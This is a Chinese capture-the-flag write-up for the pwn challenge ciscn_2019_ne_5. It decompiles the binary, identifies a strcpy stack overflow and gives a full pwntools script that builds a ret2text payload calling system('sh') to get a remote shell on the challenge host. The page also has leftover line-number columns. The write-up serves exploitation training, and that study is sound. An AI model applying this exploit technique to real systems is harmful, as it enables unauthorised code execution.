ciscn 2019 ne 5
# ciscn 2019 ne 5
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/ciscn_2019_ne_5/ciscn_2019_ne_5'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v3; // [esp+0h] [ebp-100h]
char src[4]; // [esp+4h] [ebp-FCh]
char v5; // [esp+8h] [ebp-F8h]
char s1[4]; // [esp+84h] [ebp-7Ch]
char v7; // [esp+88h] [ebp-78h]
const char *v8; // [esp+E8h] [ebp-18h]
int *v9; // [esp+ECh] [ebp-14h]
int *v10; // [esp+F4h] [ebp-Ch]
v10 = &argc;
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
fflush(stdout);
*(_DWORD *)s1 = 48;
memset(&v7, 0, 0x60u);
*(_DWORD *)src = 48;
memset(&v5, 0, 0x7Cu);
puts("Welcome to use LFS.");
printf("Please input admin password:");
__isoc99_scanf();
if ( strcmp(s1, "administrator") )
{
puts("Password Error!");
exit(0);
}
puts("Welcome!");
while ( 1 )
{
puts("Input your operation:");
puts("1.Add a log.");
puts("2.Display all logs.");
puts("3.Print all logs.");
printf("0.Exit\n:");
v9 = &v3;
v8 = "%d";
__isoc99_scanf();
switch ( v3 )
{
case 0:
exit(0);
return;
case 1:
AddLog(src);
break;
case 2:
Display(src);
break;
case 3:
Print();
break;
case 4:
GetFlag(src);
break;
default:
continue;
}
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
AddLog函数如下
int AddLog(int a1)
{
printf("Please input new log info:");
return __isoc99_scanf("%128s",a1);
}
1
2
3
4
5
2
3
4
5
Display函数如下
int __cdecl Display(char *s)
{
return puts(s);
}
1
2
3
4
2
3
4
Print函数如下
int Print()
{
return system("echo Printing......");
}
1
2
3
4
2
3
4
GetFlag函数如下
int __cdecl GetFlag(char *src)
{
char dest[4]; // [esp+0h] [ebp-48h]
char v3; // [esp+4h] [ebp-44h]
*(_DWORD *)dest = 48;
memset(&v3, 0, 0x3Cu);
strcpy(dest, src);
return printf("The flag is your log:%s\n", dest);
}
1
2
3
4
5
6
7
8
9
10
2
3
4
5
6
7
8
9
10
Gadget
ROPgadget --binary ciscn_2019_ne_5 --string "sh\x00"
Strings information
============================================================
0x080482ea : sh
1
2
3
4
2
3
4
# 思路分析
- 目前信息:
password是administrator- 存在栈溢出漏洞
plt内有system- 有
sh字符串 - No PIE
- NX 保护开启
- 思路:
GetFlag函数将拷贝AddLog函数所写入的数据,而__isoc99_scanf并未限制写入长度,由此造成溢出,有system和sh,ret2text即可
# exp
from pwn import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/ciscn_2019_ne_5/ciscn_2019_ne_5'
io = remote('node4.buuoj.cn', 27766)
# io = process(pwnfile)
elf = ELF(pwnfile)
io.sendline('administrator')
io.sendlineafter('0.Exit\n', '1')
padding = 0x48+4
system_addr = elf.symbols['system']
sh_addr = 0x80482ea
payload = flat(['a'*padding, system_addr, 0xdeadbeef, sh_addr])
io.sendline(payload)
io.sendline('4')
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
2
3
4
5
6
7
8
9
10
11
12
13
14
15
上次更新: 2022/08/15, 00:29:49